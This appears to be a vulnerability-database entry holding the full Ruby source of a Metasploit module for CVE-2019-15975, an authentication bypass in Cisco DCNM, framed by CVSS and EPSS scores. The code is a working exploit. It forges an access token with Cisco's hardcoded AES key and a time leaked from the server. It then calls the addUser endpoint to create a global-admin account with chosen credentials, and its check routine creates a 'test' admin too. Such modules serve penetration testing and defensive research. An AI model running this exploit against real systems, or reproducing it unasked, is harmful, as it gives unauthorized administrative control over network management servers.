CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.4%
This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose. After that, you can login to the web interface with those credentials. The only necessary condition is the more or less recent connection of an admin as this exploit uses a kind of session stealing.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'securerandom'
require 'base64'
class MetasploitModule < Msf::Auxiliary
include Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cisco DCNM auth bypass',
'Description' => %q{
This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.
After that, you can login to the web interface with those credentials.
The only necessary condition is the more or less recent connection of an admin as this exploit
uses a kind of session stealing.
},
'License' => MSF_LICENSE,
'Author' => [
'MR_ME', # Amazing POC on www.exploit-db.com
'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
],
'References' => [
[ 'CVE', '2019-15975'],
[ 'EDB', '48018']
],
'DisclosureDate' => '2020-06-01',
'DefaultOptions' => { 'SSL' => true },
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
)
)
register_options([
Opt::RPORT(443),
OptInt.new('RETRIES', [true, 'Retry count for the attack', 50]),
OptString.new('TARGETURI', [true, 'The base path of the Cisco DCNM', '/']),
OptString.new('USERNAME', [true, 'The username of the admin account you want to add', Faker::Internet.username(specifier: 8..10).gsub(/[^a-zA-Z0-9]/, '')]),
OptString.new('PASSWORD', [true, 'The password of the admin account you want to add', Faker::Internet.password(min_length: 8, max_length: 10)])
])
end
KEY = 's91zEQmb305F!90a'.freeze
class AESCipher
def initialize
# Cisco's hardcoded key
@bs = 16
end
def encrypt(raw)
raw = _pad(raw)
iv = "\x00" * 0x10
cipher = OpenSSL::Cipher.new('aes-128-cbc')
cipher.encrypt
cipher.key = KEY
cipher.iv = iv
Base64.encode64(cipher.update(raw))
end
private
def _pad(size)
size + (@bs - size.length % @bs).chr.to_s * (@bs - size.length % @bs)
end
end
def make_raw_token
key = 'what_a_nice_key'
uuid = SecureRandom.uuid.gsub('-', '')[0..20]
time = leak_time
raw_token = format('%<key>s-%<uuid>s-%<time>s', key: key, uuid: uuid, time: time)
raw_token
end
def bypass_auth(token, usr, pwd)
d = {
'userName' => usr,
'password' => pwd,
'roleName' => 'global-admin'
}
h = { 'afw-token' => token }
r = send_request_cgi({
'method' => 'POST',
'headers' => h,
'vars_post' => d,
'uri' => normalize_uri(target_uri.path, 'fm/fmrest/dbadmin/addUser')
})
if r && r.body != 'Access denied'
json = r.get_json_document
case json&.dig('resultMessage')
when 'Success'
return :success
when 'User already exists.'
return :user_already_exists
when 'Cannot add user since password strength check failed'
return :weak_password
end
else
return :failed_to_connect
end
:fail
end
def leak_time
r = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
fail_with(Failure::Unreachable, "Target #{rhost} could not be reached.") unless r
r_time = DateTime.strptime(r.headers['Date'][0..-4], '%a, %d %b %Y %H:%M:%S').strftime('%s')
r_time
end
def add_admin_account(usr, pwd)
res = -1
datastore['RETRIES'].times do
raw = make_raw_token
cryptor = AESCipher.new
token = cryptor.encrypt(raw).gsub("\n", '')
res = bypass_auth(token, usr, pwd)
if res != :fail && res != :failed_to_connect
return res
end
end
print_error("Didn't succeed after #{datastore['RETRIES']} attempts")
res
end
def check
res = add_admin_account('test', 'test')
if res == :success || res == :user_already_exists || res == :weak_password
Exploit::CheckCode::Vulnerable
elsif res == :failed_to_connect
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Unknown
end
end
def run
res = add_admin_account(datastore['USERNAME'], datastore['PASSWORD'])
if res == :success
print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")
elsif res == :weak_password
print_error('Unable to add admin account due to bad password strength')
elsif res == :user_already_exists
print_error('Unable to add admin account because this username already exists')
else
print_error('Something went wrong')
end
end
end
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.4%